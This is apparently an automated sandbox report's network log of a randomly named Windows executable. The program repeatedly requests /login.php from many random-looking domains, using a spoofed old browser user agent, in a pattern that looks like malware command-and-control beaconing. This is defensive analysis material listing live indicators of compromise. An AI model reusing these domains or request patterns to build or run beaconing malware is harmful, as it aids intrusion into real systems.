                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.637952089 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.007024050 CET982INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:10 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyQKLiEgjNYtDIcdjIP%2FGvr8svV8jt%2FzSE36tHyi5s3aTbSlsBWkdw%2FtKW5fUeBjI00%2Fq4TQA99Mv6gf9%2BiKS0u5%2FpOnrTOiaV1r1ZZ8MVFbeS3TA%2Bl6l41NLREm3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020fbdd645122-MSP
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=33421&sent=4&recv=6&lost=0&retrans=0&sent_bytes=970&recv_bytes=486&delivery_rate=86727&cwnd=32&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  61192.168.2.65212918.208.156.248806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.822654963 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.250683069 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  62192.168.2.652133199.59.243.227802268C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.045324087 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.476097107 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 79a69c9a-1d87-48f9-b717-b8432c593b33
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:03 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.476470947 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDYzLCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  63192.168.2.652127178.162.203.226801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.107654095 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  64192.168.2.65214644.221.84.105803472C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.949095964 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.395109892 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  65192.168.2.65214544.221.84.105803472C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.989568949 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.390666008 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  66192.168.2.6521473.94.10.34801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.994530916 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.472032070 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347465|1731347428|18|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  67192.168.2.65215044.221.84.105801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.027436018 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.476411104 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  68192.168.2.652149208.100.26.245803472C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.032504082 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.494735956 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.908651114 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.013308048 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:07 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  69192.168.2.652163178.162.203.226803472C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916671991 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  70192.168.2.652164199.191.50.8380
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916804075 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.409945011 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:08 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
